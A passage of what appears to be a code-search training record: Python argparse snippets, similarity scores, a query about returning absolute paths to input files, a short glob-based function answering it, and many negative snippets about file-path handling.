filled (might be useful when comparing several folders)\n infoparser.add_argument('--contours-only', help=helpdict['contours-only'],\n dest='contours_only', action='store_true')\n # -- if you want to output every single subplots\n infoparser.add_argument('--all', help=helpdict['all'], dest='subplot',\n action='store_true')\n # -- to change the extension used to output files (pdf is the default one,\n # but takes long, valid options are png and eps)\n infoparser.add_argument('--ext', help=helpdict['ext'],\n type=str, dest='extension', default='pdf')\n # -- to set manually the number of plots per hoorizontal raw in 1d plot\n infoparser.add_argument('--num-columns-1d', help=helpdict['num-columns-1d'],\n type=int, dest='num_columns_1d')\n # -- also analyze the non-markovian part of the chains\n infoparser.add_argument('--keep-non-markovian', help=helpdict['keep-non-markovian'],\n dest='markovian', action='store_false')\n # -- force only analyzing the markovian part of the chains\n infoparser.add_argument('--keep-only-markovian', help=helpdict['keep-only-markovian'],\n dest='only_markovian', action='store_true')\n # -- fraction of chains to be analyzed after burn-in removal (defaulting to 1.0)\n infoparser.add_argument('--keep-fraction', help=helpdict['keep-fraction'],\n type=float, dest='keep_fraction', default=1.0)\n # -- calculate the covariant matrix when analyzing the chains\n infoparser.add_argument('--want-covmat', help=helpdict['want-covmat'],\n dest='want_covmat', action='store_true')\n # -------------------------------------\n # Further customization\n # -- fontsize of plots (defaulting to 16)\n infoparser.add_argument('--fontsize', help=helpdict['fontsize'],\n type=int, default=16)\n # -- ticksize of plots (defaulting to 14)\n infoparser.add_argument('--ticksize', help=helpdict['ticksize'],\n type=int, default=14)\n # -- linewidth of 1d plots (defaulting to 4, 2 being a bare minimum for\n # legible graphs\n infoparser.add_argument('--line-width', help=helpdict['line-width'],\n type=int, default=4)\n # -- number of decimal places that appear on the tick legend. If you want\n # to increase the number of ticks, you should reduce this number\n infoparser.add_argument('--decimal', help=helpdict['decimal'], type=int,\n default=3)\n # -- number of ticks that appear on the graph.\n infoparser.add_argument('--ticknumber', help=helpdict['ticknumber'],\n type=int, default=3)\n # -- legend type, to choose between top (previous style) to sides (new\n # style). 
It modifies the place where the name of the variable appear.\n infoparser.add_argument('--legend-style', help=helpdict['legend-style'],\n type=str, choices=['sides', 'top'],\n default='sides')\n # -- width of gaussian smoothing for plotting posteriors,\n # in units of bin size, increase for smoother data.\n infoparser.add_argument('--gaussian-smoothing', help=helpdict['gaussian-smoothing'],\n type=float, default=0.5)\n # interpolation factor for plotting posteriors, 1 means no interpolation,\n # increase for smoother curves (it means that extra bins are created\n # and interpolated between computed bins)\n infoparser.add_argument('--interpolation-smoothing', help=helpdict['interpolation-smoothing'],\n type=int, default=4)\n # -- plot Fisher ellipses\n infoparser.add_argument('--plot-fisher', help=helpdict['plot-fisher'],\n dest='plot_fisher',action='store_true')\n infoparser.add_argument('--center-fisher', help=helpdict['center-fisher'],\n dest='center_fisher',action='store_true')\n\n infoparser.add_argument('--posterior-smoothing', help=helpdict['posterior-smoothing'],\n type=int, default=5)\n\n return parser", "def build_arg_parser(self):\n super(App, self).build_arg_parser()\n\n self.parser.add_argument('-v', '--verbose', action='store_true', help=\"be more verbose\")\n\n subparsers = self.parser.add_subparsers(help=\"package sub-command\", dest=\"command\")\n\n list_parser = subparsers.add_parser(\"list\") # aliases=['ls'] only works with python 3\n list_parser.add_argument('-l', '--long', action='store_true', help=\"print more detail\")\n list_parser.add_argument('--all', action='store_true', help=\"include old versions of packages\")\n list_parser.add_argument('-b', '--bundles', action='store_true', help=\"print Package bundle information\")\n list_parser.add_argument('package_ids', metavar='PACKAGE_ID', nargs='*', type=str,\n help='package ids', default=[])\n\n create_parser = subparsers.add_parser(\"create\", )\n create_parser.add_argument('names', metavar='NAME', nargs='+', type=str, help='package name', default=[])\n create_parser.add_argument('--os', action='store', help=\"os type\", default=\"unix\", choices=[\"unix\", \"windows\"])\n create_parser.add_argument('--appserver', action='store', help=\"appserver type\", choices=App.appservers, default=\"other\")\n create_parser.add_argument('--agent-version', action='store', help=\"agent version\", default=\"10.2\")\n create_parser.add_argument('--process-display-name', action='store', help=\"process display name\", default=\"\")\n create_parser.add_argument('--comment', action='store', help=\"package comment\", default=\"\")\n create_parser.add_argument('--em-host', action='store', help=\"package comment\", default=\"\")\n\n modify_parser = subparsers.add_parser(\"modify\")\n modify_parser.add_argument('-a', '--add', action='append', help=\"Add a bundle to a package\", default=[])\n modify_parser.add_argument('-r', '--remove', action='append', help=\"Remove a bundle from a package\", default=[])\n modify_parser.add_argument('package_ids', metavar='PACKAGE_ID', nargs='*', type=str,\n help='package ids', default=[])\n\n download_parser = subparsers.add_parser(\"download\")\n download_parser.add_argument('--format', action='store',\n help='write files in the given format. 
\"archive\" means zip for windows packages, tar.gz for unix packages',\n default=\"archive\", choices=[\"zip\", \"tar\", \"archive\"])\n download_parser.add_argument('package_ids', metavar='PACKAGE_ID', nargs='*', type=str,\n help='package ids', default=[])\n download_parser.add_argument('--all', action='store_true', help=\"also download old versions of packages\")\n\n delete_parser = subparsers.add_parser(\"delete\")\n delete_parser.add_argument('package_ids', metavar='PACKAGE_ID', nargs='+', type=str,\n help='package ids')\n\n override_parser = subparsers.add_parser(\"overrides\")\n\n # group = override_parser.add_mutually_exclusive_group()\n override_parser.add_argument('-l', '--list', action='store_true', help=\"list overrides\", default=False)\n override_parser.add_argument('--all', action='store_true', help=\"include old versions of packages\")\n override_parser.add_argument('--copy', action='store_true', help=\"copy overrides to another package\", default=False)\n\n override_parser.add_argument('package_ids', metavar='PACKAGE_ID', nargs='*', type=str, help='package ids')", "def parseargs() -> argparse.ArgumentParser:\n\n parser = worker.parseargs(\"ACT hybrid-analysis.com Client\")\n\n parser.add_argument(\n \"--feed\", action=\"store_true\", help=\"Download the public feed only, no lookup\"\n )\n\n parser.add_argument(\n \"--apikey\", default=\"\", help=\"community apikey for hybrid-analysis.com\"\n )\n\n parser.add_argument(\n \"--user-agent\", default=\"Falcon Sandbox\", help=\"User agent while talking to API\"\n )\n\n parser.add_argument(\n \"--no-check-certificate\",\n action=\"store_true\",\n help=\"Do not check SSL certificate\",\n )\n\n return parser", "def parseCommandLine():\n parser = OptionParser(usage=\"%prog \", version=\"%prog \" + __version__,\n description='''\n This program calculates omegaAB value from a hexagonal lattice trajectory\n stored in xyz file (see for more details)''')\n parser.add_option(\"-f\", \"--traj\", dest=\"inXyzFilename\",default = \"hexTraj.xyz\",\n help=\"xyz input trajectory file (default traj.xyz)\", metavar=\"INXYZFILE\")\n parser.add_option(\"-r\", \"--reference\", dest=\"symbol\",default = \"P11\",\n help=\"reference particle name\", metavar=\"ADATOM\")\n parser.add_option(\"-o\", \"--output\", dest=\"outDatFilename\", default=\"omega.dat\",\n help=\"output dat file with omega values for each frame. WARNING: it will be overriden\", metavar=\"OUTXYZFILE\")\n \n parser.add_option(\"-q\", \"--quiet\",\n action=\"store_false\", dest=\"verbose\", default=True,\n help=\"don't print status messages to stdout\")\n\n (options, _) = parser.parse_args()\n\n return options" ]
[ "0.69869363", "0.6829675", "0.6746405", "0.6673381", "0.66188794", "0.658462", "0.6580858", "0.6543717", "0.65387374", "0.6531024", "0.6523515", "0.6503992", "0.6499173", "0.64667153", "0.6449182", "0.6419928", "0.6393331", "0.6363311", "0.6360073", "0.6353206", "0.63527614", "0.63351756", "0.63256425", "0.63177186", "0.630223", "0.6298224", "0.6294251", "0.62868905", "0.6282018", "0.62447035", "0.6242236", "0.62398005", "0.62383705", "0.6238009", "0.6236067", "0.6235225", "0.62155765", "0.62056255", "0.6201227", "0.6196762", "0.6192222", "0.6176419", "0.61630297", "0.61398506", "0.6138216", "0.6138216", "0.6138216", "0.61327994", "0.61323196", "0.6127003", "0.6127003", "0.6120716", "0.6114867", "0.6109584", "0.6106246", "0.6104212", "0.6099471", "0.60977334", "0.6088997", "0.60684705", "0.6065659", "0.6053336", "0.60531306", "0.6048594", "0.60467696", "0.60449123", "0.60390586", "0.60337496", "0.6033043", "0.6030829", "0.6030375", "0.60289943", "0.601002", "0.6005376", "0.60048044", "0.6004643", "0.60026675", "0.59997654", "0.59951085", "0.5993511", "0.59930956", "0.59886754", "0.5986557", "0.5980693", "0.5975424", "0.5973162", "0.59713376", "0.59711945", "0.59665245", "0.5965742", "0.5963867", "0.5960802", "0.5955948", "0.5955613", "0.59553003", "0.5954248", "0.59518105", "0.59427226", "0.59426916", "0.5935008" ]
0.7635935
0
Returns absolute paths to input files.
def abspath(files):
    files = sum([glob.glob(x) for x in files], [])
    return [os.path.abspath(x) for x in files]
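A minimal usage sketch of the helper above, assuming it sits next to the standard glob and os imports; the wildcard patterns are hypothetical and only illustrate that shell-style globs are expanded before the paths are absolutized:

import glob
import os

def abspath(files):
    # expand each pattern, flatten the per-pattern lists, then absolutize
    files = sum([glob.glob(x) for x in files], [])
    return [os.path.abspath(x) for x in files]

# hypothetical patterns: every matching file comes back as an absolute path
print(abspath(['*.txt', 'data/*.csv']))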
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def inputpathabs(self):\n return os.path.abspath(self.inputpath)", "def get_file_list(input_dir):\n\tfile_paths = [input_dir +'/' + f for f in listdir(input_dir) if isfile(join(input_dir, f)) ]\n\treturn file_paths", "def sources_absolute_paths(self):\r\n abs_target_base = os.path.join(get_buildroot(), self.target_base)\r\n for src in self.sources:\r\n yield os.path.join(abs_target_base, src)", "def get_input_files(dir_path):\n return [os.path.join(dir_path,f) for f in os.listdir(dir_path)\n if os.path.isfile(os.path.join(dir_path,f))]", "def input_path(self, filename):\n\n return os.path.abspath(os.path.expanduser(os.path.join(self.input_dir, filename)))", "def _get_file_paths(self):\n return [os.path.join(self.path, self.mode, 'waveforms', file_name + '.npy') for file_name in self.file_names]", "def get_file_paths():\n audio_folder = MY_DIR + '/assets'\n\n audio_addy_list = []\n for file in os.scandir(audio_folder):\n audio_addy_list.append(file.path)\n\n return audio_addy_list", "def get_paths(input_folder):\n list_files = []\n conll_folder = glob.glob(input_folder + '/*.json')\n \n for filename in conll_folder:\n list_files.append(filename)\n\n return list_files", "def get_image_path(raw_input_dir: str) -> list:\n result = []\n for root, dirs, files in os.walk(raw_input_dir):\n for file in files:\n result.append(os.path.join(root, file))\n return result", "def get_paths(file_path):\n return glob(path.join(file_path, '*'))", "def input_path(self, filename):\n\n return self.filename_path_join(self.input_dir, filename)", "def filepaths(self):\n pass", "def getpaths_fromfile(input_prefix_, file_handle_):\n\n input_paths = []\n\n for line in file_handle_:\n line = line.strip()\n if line != \"\":\n dirname = line\n path = os.path.join(input_prefix_, \"%s*\" % dirname)\n input_paths.append(tuple([dirname, path]))\n\n return input_paths", "def handle_files_args(*paths_args):\n paths = []\n\n for paths_arg in paths_args:\n # Handle paths implicitly rooted at user home dir\n paths_arg = os.path.expanduser(paths_arg)\n\n # Expand wildcards\n paths_arg = glob.glob(paths_arg)\n\n # Create list of pathlib.Path objects\n paths.extend([pathlib.Path(path_arg) for path_arg in paths_arg])\n\n return paths", "def get_input_files(self, action):\n assert action == \"run\", \"Unsupported action\"\n return self.path_tpl.format(infix=\"\", ext=\".bam\")", "def inputFiles(self):\n return (self.matrixFile,)", "def test_get_output_filepaths(self):\r\n\r\n output_dir = \".\"\r\n\r\n fasta_fp = \"seqs.fna\"\r\n\r\n qual_fp = \"seqs.qual\"\r\n\r\n expected_fasta_fp = \"./seqs_filtered.fasta\"\r\n expected_qual_fp = \"./seqs_filtered.qual\"\r\n\r\n actual_fasta_fp, actual_qual_fp =\\\r\n get_output_filepaths(output_dir, fasta_fp, qual_fp)\r\n\r\n self.assertEqual(actual_fasta_fp, expected_fasta_fp)\r\n self.assertEqual(actual_qual_fp, expected_qual_fp)\r\n\r\n # Test for relative paths\r\n output_dir = \"test/\"\r\n\r\n fasta_fp = \"../seqs.fna\"\r\n\r\n qual_fp = \"quality_scores/seqs.qual\"\r\n\r\n expected_fasta_fp = \"test/seqs_filtered.fasta\"\r\n expected_qual_fp = \"test/seqs_filtered.qual\"\r\n\r\n actual_fasta_fp, actual_qual_fp =\\\r\n get_output_filepaths(output_dir, fasta_fp, qual_fp)\r\n\r\n self.assertEqual(actual_fasta_fp, expected_fasta_fp)\r\n self.assertEqual(actual_qual_fp, expected_qual_fp)", "def find_all_infilepaths(in_dir):\n workdir = os.getcwd()\n os.chdir(in_dir)\n\n infiles_paths = dict()\n for infilename in glob.glob(\"[0-9]*_[0-9]*_[0-9]*.hdf5\"):\n pos = infilename.split('_')\n 
pos[-1] = pos[-1].split('.')[0]\n pos = tuple(list(map(lambda s: int(s), pos)))\n num_pos = _3d_to_numeric\n infiles_paths[num_pos] = os.path.join(in_dir, infilename)\n\n os.chdir(workdir)\n return infiles_paths", "def detectFiles(self, input):\n output = []\n if os.path.isfile(input):\n output.append(input)\n else:\n input = os.path.join(input, '*') if os.path.isdir(input) else input\n for file in glob.glob(input):\n output.append(file)\n return output", "def inputFiles(self):\n inputfiles = set()\n for f in self:\n [ inputfiles.add(x) for x in f['input']]\n return list(inputfiles)", "def get_paths(input_folder: str) -> list[str]:\n\n return [f for f in os.listdir(input_folder) if f[-4:] == '.txt' and f[:3] != 'top']", "def collect_input_files(input_directory_path: Path) -> Generator[Path, None, None]:\n return input_directory_path.glob('**/*')", "def input_files_from_path(path):\n import glob\n input_files = None\n if type(path) is list:\n input_files = []\n for p in path:\n if '*' in p:\n input_files.extend(glob.glob(p))\n else: # neither wildcard nor comma separated list\n input_files.append(p)\n else:\n if ',' in path:\n input_files = path.split(',')\n elif '*' in path:\n input_files = glob.glob(path)\n else: # neither wildcard nor comma separated list\n input_files = [path]\n input_files = [os.path.abspath(f) for f in input_files]\n return [f for f in input_files if os.path.exists(f) or f.startswith('/store')]", "def full_path(startPath,files):\n\n files = list_strings(files)\n base = os.path.split(startPath)[0]\n return [ os.path.join(base,f) for f in files ]", "def relative_to_buildroot(self):\n return [os.path.join(self.rel_path, source) for source in self.source_paths]", "def getFilePaths():\n \n image_dir = r'/hpc/wfok007/mpi_heart/Training Set'\n mask_paths = []\n image_paths = []\n for root, dirs, files in os.walk(image_dir, topdown=False):\n for name in files:\n if name == 'laendo.nrrd':\n mask_paths.append(os.path.join(root, name))\n elif name == 'lgemri.nrrd':\n image_paths.append(os.path.join(root, name))\n else:\n print ('%s is unknown' %name)\n return mask_paths, image_paths", "def get_files_paths(self):\n return self.__files_paths", "def resolve_file_paths(local_path):\n local_path = os.path.abspath(local_path)\n files = []\n if local_path.find('*') > -1:\n # Supplied path is a pattern - relative directory will be the\n # path up to the first wildcard\n ref_dir_str = local_path.split('*')[0].rstrip('/\\\\')\n if not os.path.isdir(ref_dir_str):\n ref_dir_str = os.path.dirname(ref_dir_str)\n ref_dir = pathlib.Path(ref_dir_str)\n pattern = local_path[len(ref_dir_str + os.pathsep):]\n files = [str(f) for f in ref_dir.glob(pattern) if f.is_file()]\n local_path = ref_dir_str\n else:\n if os.path.isdir(local_path):\n # Supplied path is a directory\n files = [os.path.join(local_path, f) for f in os.listdir(local_path)\n if os.path.isfile(os.path.join(local_path, f))]\n elif os.path.isfile(local_path):\n # Supplied path is a file\n files.append(local_path)\n local_path = os.path.dirname(local_path)\n return local_path, files", "def output_files(self):\n output_files = []\n for split in self.split_files:\n output_files.extend(split.filepaths)\n return output_files", "def get_file_list(input_list):\n if not isinstance(input_list, Iterable)\\\n or isinstance(input_list, str):\n raise BirdVoxClassifyError('input_list must be a non-string iterable')\n file_list = []\n for item in input_list:\n if os.path.isfile(item):\n file_list.append(os.path.abspath(item))\n elif 
os.path.isdir(item):\n for fname in os.listdir(item):\n path = os.path.join(item, fname)\n if os.path.isfile(path):\n file_list.append(path)\n else:\n raise BirdVoxClassifyError(\n 'Could not find input at path {}'.format(item))\n\n return file_list", "def get_all_paths(why = 'train'):\r\n if why == 'train':\r\n parent_folder = train_parent_folder\r\n if why == 'test':\r\n parent_folder = test_test_folder\r\n sub_folders = glob.glob(parent_folder) # Directories of all languages\r\n image_paths = [glob.glob(sub_folder + '\\*') for sub_folder in sub_folders] # Directories of all characters\r\n image_paths = sum(image_paths, []) # Flatten out the 2D list to a 1D list \r\n return image_paths", "def _map_files(self, files):\n if getattr(files, '__iter__', None):\n for f in files:\n if not os.path.isabs(f):\n yield os.path.join(self._path, f)\n else:\n yield f\n else:\n if not os.path.isabs(files):\n yield os.path.join(self._path, files)\n else:\n yield files", "def get_input_files():\n\n raw_list = abspath(get('input_files'))\n valid_types = ['image/jpeg', 'image/tiff']\n images = [x for x in raw_list if mimetypes.guess_type(x)[0] in valid_types]\n print('* Input images: {}'.format(len(images)))\n return images", "def get_paths(args):\n log, rest = get_log_path(args)\n out, _ = get_out_path(args)\n temp, _ = get_temp_path(args)\n return log, out, temp, rest", "def get_all_fullpaths(self):\n files = []\n for mf in self.manifests:\n files.extend(self.manifests[mf].get_fullpaths())\n return files", "def filePaths(directory_with_files):\n\n # get a list of file names in directory\n list_of_files = os.listdir(directory_with_files) \n\n # join directory path and file name to get full paths to files\n filepaths = [os.path.join(directory_with_files, filename) for filename in list_of_files]\n\n return filepaths", "def get_datapaths(input_dir):\n image_paths = []\n assert os.path.isdir(input_dir), f\"{input_dir} is not existed\"\n\n for root, _, names in os.walk(input_dir):\n for name in names:\n path = os.path.join(root, name)\n image_paths.append(path)\n return image_paths", "def output_files(self):\n return [self.input_files()[0].replace(\".lhe.gz\", \".stdhep\").replace(\".lhe\", \".stdhep\")]", "def _generate_file_paths(self):\n for table_name in self.tables:\n logger.info(f\"Generating input and output paths for table '{table_name}'...\")\n self.input_paths[table_name] = os.path.join(self.pipeline['input_dir'], f'{table_name}.xml')\n logger.info(f\"Input path for table '{table_name}': {self.input_paths[table_name]}\")\n self.output_paths[table_name] = os.path.join(self.pipeline['output_dir'], f'{table_name}.jsonl')\n logger.info(f\"Output path for table '{table_name}': {self.output_paths[table_name]}\")\n logger.info(f\"Generated {len(self.input_paths)} input paths and {len(self.output_paths)} output paths.\")", "def get_paths(self):\n return (self.world_fpath, self.subj_fpath, self.peds_fpath)", "def get_input_files(workflow_id):\n logger = fsurfer.log.get_logger()\n input_files = []\n conn = None\n try:\n conn = fsurfer.helpers.get_db_client()\n cursor = conn.cursor()\n input_query = \"SELECT path \" \\\n \"FROM freesurfer_interface.input_files \" \\\n \"WHERE job_id = %s\"\n cursor.execute(input_query, [workflow_id])\n for row in cursor.fetchall():\n input_files.append(row[0])\n input_files.append(os.path.dirname(row[0]))\n except psycopg2.Error as e:\n logger.exception(\"Error: {0}\".format(e))\n return None\n finally:\n if conn:\n conn.close()\n return input_files", "def 
get_train_input_paths(self, random_effect_name):\n output_dir = path_join(self.root_output_dir, path_join(random_effect_name, \"partition\"))\n training_data_dir = path_join(output_dir, \"trainingData\")\n validation_data_dir = path_join(output_dir, \"validationData\")\n metadata_file = path_join(output_dir, path_join(\"metadata\", \"tensor_metadata.json\"))\n partition_list_file = path_join(output_dir, \"partitionList.txt\")\n return training_data_dir, validation_data_dir, metadata_file, partition_list_file", "def get_input_files(self, action):\n\n def input_function(wildcards):\n \"\"\"Helper rapper function\"\"\"\n return expand(\n self.base_path_in.format(wildcards=wildcards),\n postproc=[self._get_postproc_token()],\n ext=self.extensions,\n )\n\n assert action == \"run\", \"Unsupported action\"\n return input_function", "def _get_paths():\n paths = [\n '/'\n ]\n return paths", "def get_source_files(self):\n return [\n path.as_posix()\n for path in _Path(self.src_dir).rglob(\"*\")\n if not path.is_dir()\n ] + [\n (path / \"CMakeLists.txt\").as_posix()\n for path in _PurePath(self.src_dir).parents\n ]", "def input_dir(path):\n global datasets\n\n path = os.path.abspath(path)\n if not os.path.isdir(path):\n raise IOError('Incorrect input_dir specified: no such directory')\n for dataset_name in datasets:\n dataset_path = os.path.join(path, '%s_set.hdf' % dataset_name)\n if not os.path.exists(dataset_path):\n raise IOError('Incorrect input_dir specified:'\n ' %s set file not found' % dataset_path)\n return path", "def inputpathrel(self):\n if self.config:\n relpath = os.path.relpath(self.inputpath, self.config.workingdir)\n\n if relpath.startswith(\"../\"):\n return self.inputpath\n\n else:\n return relpath\n\n return self.inputpath", "def GetInputPath(self):\n self.inputDir = raw_input(\"Where should files be read from? This can be a file or a folder of files\\n\\r>>> \")\n if os.path.isabs(self.inputDir):\n if os.path.isdir(self.inputDir):\n self.isFolder = True\n self.inputDirs = os.listdir(self.inputDir)\n elif os.path.isfile(self.inputDir):\n self.isFolder = False\n self.inputDirs = [self.inputDir]\n else:\n print \"That path does not exist. Try again\"\n self.GetInputPath()\n else:\n print \"that was not an excepted path name. 
Try again.\"\n self.GetInputPath()", "def test_get_output_filepaths(self):\r\n\r\n actual_fna_fp, actual_log_fp = get_output_filepaths(\".\",\r\n '/home/tests/seqs.fna')\r\n\r\n expected_fna_fp = \"./seqs_rev_primer_truncated.fna\"\r\n expected_log_fp = \"./rev_primer_truncation.log\"\r\n\r\n self.assertEqual(actual_fna_fp, expected_fna_fp)\r\n self.assertEqual(actual_log_fp, expected_log_fp)", "def GetExpectationFilepaths(self) -> List[str]:\n raise NotImplementedError()", "def treat(input, output):\n files = find(input)\n acc = []\n for file in files:\n fileInfo = extract(file)\n out = makeOutputPath(output, fileInfo[\"path\"], fileInfo[\"filename\"])\n if not out == None:\n fileInfo[\"outPath\"] = out\n acc += [fileInfo]\n return acc", "def join_infile_path(*paths):\n # Join path components\n path = '/'.join(paths)\n # Correct double slashes, if any is present\n path = path.replace('//', '/')\n\n return path", "def get_data_file_paths(input_folder: str, data_file_prefix: str = \"\",\n data_file_postfix: str = \".nc\") -> list:\n data_file_paths = list()\n # we look at all subfolders, whatever they are named\n subfolders = get_files(input_folder, keep_path=True, order_numerical=True)\n for subfolder in subfolders:\n data_files = get_files(subfolder, prefix=data_file_prefix,\n postfix=data_file_postfix, keep_path=True,\n order_numerical=True)\n data_file_paths += data_files\n return data_file_paths", "def _resolve_paths(paths):\n allowed_ext = tuple(MIMES.keys())\n\n resolved = []\n for path in paths:\n if os.path.isdir(path):\n resolved.extend(\n entry.path for entry in os.scandir(path)\n if entry.is_file() and entry.name.lower().endswith(allowed_ext)\n )\n elif os.path.isfile(path) and path.lower().endswith(allowed_ext):\n resolved.append(path)\n return resolved", "def get_output_filepaths(output_dir,\r\n fasta_fp,\r\n qual_fp):\r\n\r\n if not output_dir.endswith('/'):\r\n output_dir += '/'\r\n\r\n fasta_out_fp = output_dir + basename(fasta_fp).split('.')[0] +\\\r\n \"_filtered.fasta\"\r\n\r\n qual_out_fp = output_dir + basename(qual_fp).split('.')[0] +\\\r\n \"_filtered.qual\"\r\n\r\n return fasta_out_fp, qual_out_fp", "def _get_file_paths(self, ignored_exts: Optional[Set[str]]) -> List[str]:\n dir_path = os.path.join(self._target_dir, '**')\n all_paths = glob.glob(dir_path, recursive=True)\n if ignored_exts is None:\n return [p for p in all_paths if os.path.isfile(p)]\n file_paths = [p for p in all_paths if self._extr_ext(p) not in ignored_exts]\n return [p for p in file_paths if os.path.isfile(p)]", "def input_path(self):\n \n input_path = stringify(self._input_path)\n if input_path is None:\n with current_context() as ctx:\n input_path_relative = stringify(self.input_path_relative)\n if input_path_relative is not None:\n input_path = join_path(ctx.paths.input, input_path_relative)\n else:\n input_path = ctx.current.project.input_path\n return input_path", "def local_paths(self) -> List[Path]:\n return self._local_paths", "def glob_fs(self):\n\n found_files = []\n for pattern in self.glob_patterns:\n found_files += [PathString(present_file)\n for present_file in glob.glob(pattern)]\n return found_files", "def _get_target_files(self) -> List[Path]:\n repo = get_git_repo()\n submodules = repo.submodules # type: ignore\n submodule_paths = [\n self._fname_to_path(repo, submodule.path) for submodule in submodules\n ]\n\n # resolve given paths relative to current working directory\n paths = [p.resolve() for p in self._paths]\n if self._base_commit is not None:\n paths = [\n a\n for a in 
(self._status.added + self._status.modified)\n # diff_path is a subpath of some element of input_paths\n if any((a == path or path in a.parents) for path in paths)\n ]\n changed_count = len(paths)\n click.echo(f\"| looking at {unit_len(paths, 'changed path')}\", err=True)\n paths = [\n path\n for path in paths\n if all(\n submodule_path not in path.parents\n for submodule_path in submodule_paths\n )\n ]\n if len(paths) != changed_count:\n click.echo(\n f\"| skipping files in {unit_len(submodule_paths, 'submodule')}: \"\n + \", \".join(str(path) for path in submodule_paths),\n err=True,\n )\n\n # Filter out ignore rules, expand directories\n self._ignore_rules_file.seek(0)\n patterns = Parser(self._base_path).parse(self._ignore_rules_file)\n\n file_ignore = FileIgnore(\n base_path=self._base_path, patterns=patterns, target_paths=paths\n )\n\n walked_entries = list(file_ignore.entries())\n click.echo(\n f\"| found {unit_len(walked_entries, 'file')} in the paths to be scanned\",\n err=True,\n )\n filtered: List[Path] = []\n for elem in walked_entries:\n if elem.survives:\n filtered.append(elem.path)\n\n skipped_count = len(walked_entries) - len(filtered)\n if skipped_count:\n click.echo(\n f\"| skipping {unit_len(range(skipped_count), 'file')} based on path ignore rules\",\n err=True,\n )\n\n relative_paths = [path.relative_to(self._base_path) for path in filtered]\n\n return relative_paths", "def prep_files(app):\n smali_paths = []\n start = time.time()\n \n for root, dirs, files in os.walk(app, topdown=False):\n for name in files:\n if name[-6:] == \".smali\":\n smali_paths.append(str(os.path.join(root, name)))\n \n return smali_paths", "def get_files():\n\n img_dir = '../ADE20K_2016_07_26/full_data/images/validation/'\n sem_dir = '../ADE20K_2016_07_26/full_data/annotations/validation/'\n ins_dir = '../ADE20K_2016_07_26/full_data/annotations_instance/validation/'\n\n img_files = os.listdir(img_dir)\n sem_files = os.listdir(sem_dir)\n ins_files = os.listdir(ins_dir)\n \n img_files = [ os.path.join(img_dir,item) for item in img_files ]\n sem_files = [ os.path.join(sem_dir,item) for item in sem_files ]\n ins_files = [ os.path.join(ins_dir,item) for item in ins_files ]\n \n img_files.sort()\n sem_files.sort()\n ins_files.sort()\n \n return img_files, sem_files, ins_files", "def get_fastq_files(self) -> List[Path]:\n return list(self.sequence_data_paths.fastq_path.glob(\"*.fastq.gz\")) # type: ignore", "def get_testcases(input, output):\n input_files = set(os.listdir(input))\n output_files = set(os.listdir(output))\n common_files = sorted(\n list(input_files & output_files), key=lambda x: os.path.basename(x)\n )\n return common_files", "def args_to_input_file_list(arg):\n # Check if the input file is a directory.\n if os.path.isdir(arg[0]):\n print \"Provided directory.\"\n file_list = [arg[0] + \"/\" + \n f for f in os.listdir(arg[0])]\n else:\n file_list = arg\n return file_list", "def files(self):\n self._printer('\\tFiles Walk')\n for directory in self.directory:\n for path in os.listdir(directory):\n full_path = os.path.join(directory, path)\n if os.path.isfile(full_path):\n if not path.startswith('.'):\n self.filepaths.append(full_path)\n return self._get_filepaths()", "def expandFilenames(filenames):\n \n abs_filenames = []\n for f in filenames:\n abs_filenames.append(os.path.abspath(f))\n \n return abs_filenames", "def storer_paths():\n return [dir_unchecked(), dir_checked(),\n dir_backup(), dir_tests()]", "def __get_absolute_cert_files(self):\n\n abs_path = None\n if 
self.__mqtt_cert_file:\n root = pathlib.Path(__file__).parent.absolute()\n abs_path = (os.path.join(root, 'cert', self.__mqtt_cert_file + '.pem'),\n os.path.join(root, 'cert', self.__mqtt_cert_file + '.pkey'))\n return abs_path", "def get_files(self):\n # TODO checking extensions here should be moved to parsers, and it should\n # probably use 'magic' rather than extensions. See Python magic library\n\n self.files = []\n if Path(self.args.path).is_dir():\n for root, dirnames, filenames in os.walk(self.args.path):\n for extension in ['pcap', 'dump', 'cap']:\n for filename in fnmatch.filter(filenames, '*.' + extension):\n self.files.append(os.path.join(root, filename))\n elif Path(self.args.path).is_file() and \\\n os.path.split(str(self.args.path))[-1].split('.')[-1] in {'pcap', 'dump', 'cap'}:\n self.files.append(str(self.args.path))\n else:\n self.logger.error(\n 'Input \\'%s\\' was neither a file nor a directory.', str(self.args.path))\n\n if not self.files:\n self.logger.error(\n 'Did not find file(s) from \\'%s\\'.', str(self.args.path))\n return", "def get_valid_files(paths: List[str]) -> List[str]:\n all_paths = []\n\n for path in paths:\n if path.endswith('.txt'):\n all_paths.append(path)\n elif path.endswith('.zip'):\n # this is only a placeholder for adding mer files\n all_paths.extend(get_txt_files_from_zip(path))\n elif path.endswith('.mer'):\n all_paths.append(path)\n else:\n raise TypeError('Can only import .txt, .zip & .mer. Invalid file: ' + path)\n return all_paths", "def xml_filepaths(cls):\n # pylint: disable=no-self-argument,not-an-iterable\n filepaths = []\n\n for filename in cls.xml_filenames:\n filepath = os.path.join(\n cls._OUTPUT_SUBFOLDER,\n '{}_{}.save'.format(cls._PREFIX, cls._CP_WRITE_UNIT_NUMBER),\n filename,\n )\n filepaths.append(filepath)\n\n return filepaths", "def _findFiles(self, inputfolder):\n protofile, caffemodel = None, None\n files = os.listdir(inputfolder)\n for f in files:\n name, ext = splitext(f)\n if ext == '.caffemodel':\n caffemodel = join(inputfolder, f)\n elif f == 'deploy.prototxt':\n protofile = join(inputfolder, f)\n return protofile, caffemodel", "def sources_relative_to_buildroot(self):\r\n for src in self.sources:\r\n yield os.path.join(self.target_base, src)", "def find_all_files(self):\n look4files = [ f for f in listdir(self.file_location) if isfile(join(self.file_location,f)) ]\n return look4files", "def get_all_files(cwd):\n return os.listdir(cwd)", "def incoming_paths(root_dir, parent_dir):\n return {\n 'F1' : os.path.join(root_dir, \"F1\"),\n 'F' : os.path.join(parent_dir, \"F\"),\n 'F2' : os.path.join(parent_dir, \"F2-in\"),\n 'D1' : os.path.join(root_dir, \"D1\"),\n 'D' : os.path.join(parent_dir, \"D\"),\n 'D2' : os.path.join(parent_dir, \"D2-in\"),\n }", "def get_filepaths(self):\n image_filepaths = set()\n for one_dir in self.dirs:\n for root, dirnames, filenames in os.walk(one_dir):\n for filename in filenames:\n if re.search(r\"\\.(jpg|jpeg|png|bmp|tiff)$\", filename):\n image_filepaths.add(os.path.join(root, filename))\n image_filepaths = sorted(list(image_filepaths))\n return image_filepaths", "def _get_files(self, paths: List[str]) -> List[Tuple[str, bytes]]:\n 